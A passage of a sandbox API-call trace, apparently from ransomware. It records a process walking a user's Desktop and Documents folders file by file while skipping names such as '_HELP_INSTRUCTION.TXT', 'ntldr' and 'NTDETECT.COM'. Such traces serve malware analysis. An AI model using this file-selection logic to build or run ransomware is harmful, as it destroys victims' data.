[0102.072] lstrcmpW (lpString1="zKa6.xls", lpString2="..") returned 1 [0102.072] lstrcmpW (lpString1="zKa6.xls", lpString2=".") returned 1 [0102.072] StrStrW (lpFirst="zKa6.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.072] StrStrW (lpFirst="zKa6.xls", lpSrch="ntldr") returned 0x0 [0102.072] StrStrW (lpFirst="zKa6.xls", lpSrch="NTLDR") returned 0x0 [0102.072] StrStrW (lpFirst="zKa6.xls", lpSrch="NTDETECT.COM") returned 0x0 [0102.072] StrStrW (lpFirst="zKa6.xls", lpSrch="ntdetect.com") returned 0x0 [0102.072] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0102.072] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.072] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.073] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.073] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0102.073] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0102.073] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0102.073] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0102.073] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0102.073] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.074] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.074] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.074] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2="..") returned 1 [0102.074] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2=".") returned 1 [0102.074] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0102.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0102.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0102.074] SetErrorMode (uMode=0x1) returned 0x1 [0102.074] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0102.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.074] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0102.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0102.076] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0102.076] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0102.076] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.077] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.077] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.077] lstrcmpW (lpString1="6IAM.m4a", lpString2="..") returned 1 [0102.077] lstrcmpW (lpString1="6IAM.m4a", lpString2=".") returned 1 [0102.077] StrStrW (lpFirst="6IAM.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.077] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntldr") returned 0x0 [0102.077] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTLDR") returned 0x0 [0102.077] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0102.077] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntdetect.com") returned 0x0 [0102.077] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.077] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.077] lstrcmpW (lpString1="7IFRA25.gif", lpString2="..") returned 1 [0102.077] lstrcmpW (lpString1="7IFRA25.gif", lpString2=".") returned 1 [0102.077] StrStrW (lpFirst="7IFRA25.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.077] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntldr") returned 0x0 [0102.077] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTLDR") returned 0x0 [0102.077] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.077] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntdetect.com") returned 0x0 [0102.077] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.077] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.077] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2="..") returned 1 [0102.077] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2=".") returned 1 [0102.077] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.077] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntldr") returned 0x0 [0102.077] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTLDR") returned 0x0 [0102.077] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTDETECT.COM") returned 0x0 [0102.078] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntdetect.com") returned 0x0 [0102.078] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.078] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0102.078] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0102.078] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0102.078] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0102.079] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0102.079] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0102.079] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0102.079] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0102.079] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.079] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.080] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.080] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.080] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2="..") returned 1 [0102.080] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2=".") returned 1 [0102.080] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0102.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0102.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0102.080] SetErrorMode (uMode=0x1) returned 0x1 [0102.080] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0102.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.080] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0102.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3a5690 [0102.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0102.082] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0102.082] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.082] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.082] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2="..") returned 1 [0102.082] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2=".") returned 1 [0102.082] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.082] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntldr") returned 0x0 [0102.082] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTLDR") returned 0x0 [0102.082] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0102.082] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntdetect.com") returned 0x0 [0102.082] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.082] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.082] lstrcmpW (lpString1="8W8bO.gif", lpString2="..") returned 1 [0102.082] lstrcmpW (lpString1="8W8bO.gif", lpString2=".") returned 1 [0102.082] StrStrW (lpFirst="8W8bO.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.082] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntldr") returned 0x0 [0102.082] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTLDR") returned 0x0 [0102.082] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.082] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntdetect.com") returned 0x0 [0102.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.083] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.083] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2="..") returned 1 [0102.083] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2=".") returned 1 [0102.083] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.083] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntldr") returned 0x0 [0102.083] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTLDR") returned 0x0 [0102.083] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTDETECT.COM") returned 0x0 [0102.083] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntdetect.com") returned 0x0 [0102.083] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.083] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0102.083] FindClose (in: hFindFile=0x3a5690 | out: hFindFile=0x3a5690) returned 1 [0102.084] FindClose (in: hFindFile=0x3a5690 | out: hFindFile=0x3a5690) returned 0 [0102.084] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0102.084] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0102.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0102.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3a5690 [0102.087] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0102.087] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0102.087] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.087] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.087] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.087] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.087] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0102.087] FindNextFileW (in: hFindFile=0x3a5690, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0102.087] FindClose (in: hFindFile=0x3a5690 | out: hFindFile=0x3a5690) returned 1 [0102.088] FindClose (in: hFindFile=0x3a5690 | out: hFindFile=0x3a5690) returned 0 [0102.088] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.088] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.088] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0102.088] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0102.088] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0102.088] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0102.088] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0102.089] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 1 [0102.089] FindClose (in: hFindFile=0x3a5590 | out: hFindFile=0x3a5590) returned 0 [0102.089] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.089] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0102.089] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0102.089] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0102.089] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0102.089] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0102.089] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0102.089] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0102.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0102.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0102.089] SetErrorMode (uMode=0x1) returned 0x1 [0102.090] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0102.090] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.090] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.090] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0102.090] 